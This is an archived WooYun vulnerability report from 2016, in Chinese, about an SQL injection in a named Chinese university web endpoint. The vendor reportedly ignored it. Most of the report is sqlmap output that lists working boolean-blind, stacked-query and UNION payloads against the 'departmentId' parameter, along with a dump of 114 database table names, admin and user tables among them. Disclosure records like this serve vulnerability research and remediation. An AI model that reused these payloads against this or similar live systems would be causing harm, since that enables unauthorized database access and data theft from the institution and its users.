乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-02-24: 细节已通知厂商并且等待厂商处理中 2016-02-29: 厂商已经主动忽略漏洞,细节向公众公开
http://woodscience.csuft.edu.cn/test/Common/GetDataHandler.ashx?departmentId=20&key=GetProfessionComboboxJson
sqlmap resumed the following injection point(s) from stored session:---Parameter: departmentId (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: departmentId=20 AND 6267=6267&key=GetProfessionComboboxJson Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: departmentId=20;WAITFOR DELAY '0:0:5'--&key=GetProfessionComboboxJson Type: UNION query Title: Generic UNION query (NULL) - 3 columns Payload: departmentId=20 UNION ALL SELECT 18,CHAR(113)+CHAR(118)+CHAR(112)+CHAR(113)+CHAR(113)+CHAR(85)+CHAR(90)+CHAR(69)+CHAR(77)+CHAR(100)+CHAR(83)+CHAR(85)+CHAR(88)+CHAR(73)+CHAR(102)+CHAR(113)+CHAR(118)+CHAR(107)+CHAR(113)+CHAR(113),18-- &key=GetProfessionComboboxJson---web server operating system: Windows 2008 or Vistaweb application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.0back-end DBMS: Microsoft SQL Server 2008Database: zdzxwdata[114 tables]+-----------------------+| PE_AdZone || PE_Admin || PE_Advertisement || PE_Announce || PE_AreaCollection || PE_Article || PE_Author || PE_Bank || PE_BankrollItem || PE_Card || PE_Channel || PE_City || PE_Class || PE_Classroom || PE_Client || PE_Comment || PE_Company || PE_ComplainItem || PE_Config || PE_ConsumeLog || PE_Contacter || PE_CopyFrom || PE_Country || PE_DeliverCharge || PE_DeliverItem || PE_DeliverType || PE_Dictionary || PE_DownError || PE_DownServer || PE_Equipment || PE_Favorite || PE_Field || PE_Filters || PE_Friend || PE_FriendSite || PE_FsKind || PE_GuestBook || PE_GuestKind || PE_HistrolyNews || PE_HouseArea || PE_HouseCS || PE_HouseCZ || PE_HouseConfig || PE_HouseHZ || PE_HouseQG || PE_HouseQZ || PE_InfoS || PE_InvoiceItem || PE_Item || PE_JobCategory || PE_JsFile || PE_KeyLink || PE_Label || PE_Log || PE_Message || PE_NewKeys || PE_OrderForm || PE_OrderFormItem || PE_Page || PE_PageClass || PE_Payment || PE_PaymentType || PE_Photo || PE_Position || PE_PositionSupplyInfo || PE_PresentProject || PE_Producer || PE_Product || PE_Province || PE_RechargeLog || PE_Resume || PE_ServiceItem || PE_ShoppingCarts || PE_Skin || PE_Soft || PE_Space || PE_SpaceBook || PE_SpaceComment || PE_SpaceDiary || PE_SpaceKind || PE_SpaceLink || PE_SpaceMusic || PE_SpacePhoto || PE_SpaceVisitor || PE_Special || PE_SubCompany || PE_Supply || PE_Supply_Company || PE_Survey || PE_SurveyAnswer || PE_SurveyInput || PE_SurveyQuestion || PE_Template || PE_TemplateProject || PE_Trademark || PE_TransferItem || PE_UsedDetail || PE_User || PE_UserGroup || PE_Vote || PE_WorkPlace || ZD_DL || ZD_DWCXRZ || ZD_DWK || ZD_DX || ZD_TempKYDW || ZD_TempZDBX || ZD_ZDBG || ZD_ZDBXK || ZD_ZDBXTYC || ZD_ZDCXRZ || ZD_ZDTZBXK || ZD_jjyw || dtproperties |+-----------------------+
危害等级:无影响厂商忽略
忽略时间:2016-02-29 09:50
漏洞Rank:4 (WooYun评价)
暂无